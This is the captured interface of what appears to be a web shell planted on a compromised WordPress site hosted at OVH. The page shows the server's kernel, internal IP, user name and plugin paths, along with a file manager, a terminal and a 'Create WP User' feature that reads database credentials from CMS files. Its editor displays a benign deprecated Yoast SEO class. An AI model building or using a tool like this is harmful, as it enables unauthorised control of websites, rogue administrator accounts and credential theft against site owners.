Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.217.47
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
infrops.pl
/
wp-content
/
plugins
/
wordpress-seo
/
src
/
deprecated
/
admin
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
views
[目录]
drwxr-xr-x
2024-04-02 19:02
class-helpscout.php
1.46 KB
-rw-r--r--
2024-04-02 19:02
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
class-helpscout.php
<?php /** * WPSEO plugin file. * * @package WPSEO\Admin */ /** * Class WPSEO_HelpScout * * @codeCoverageIgnore * @deprecated 20.3 */ class WPSEO_HelpScout implements WPSEO_WordPress_Integration { /** * WPSEO_HelpScout constructor. * * @codeCoverageIgnore * @deprecated 20.3 * * @param string $beacon_id The beacon id. * @param array $pages The pages where the beacon is loaded. * @param array $products The products the beacon is loaded for. * @param bool $ask_consent Optional. Whether to ask for consent before loading in HelpScout. */ public function __construct( $beacon_id, array $pages, array $products, $ask_consent = false ) { _deprecated_function( __METHOD__, 'Yoast SEO 20.3' ); } /** * {@inheritDoc} * * @codeCoverageIgnore * @deprecated 20.3 */ public function register_hooks() { _deprecated_function( __METHOD__, 'Yoast SEO 20.3', 'HelpScout_Beacon::register_hooks' ); } /** * Enqueues the HelpScout script. * * @codeCoverageIgnore * @deprecated 20.3 * * @return void */ public function enqueue_help_scout_script() { _deprecated_function( __METHOD__, 'Yoast SEO 20.3', 'HelpScout_Beacon::enqueue_help_scout_script' ); } /** * Outputs a small piece of javascript for the beacon. * * @codeCoverageIgnore * @deprecated 20.3 * * @return void */ public function output_beacon_js() { _deprecated_function( __METHOD__, 'Yoast SEO 20.3', 'HelpScout_Beacon::output_beacon_js' ); } }
关闭
保存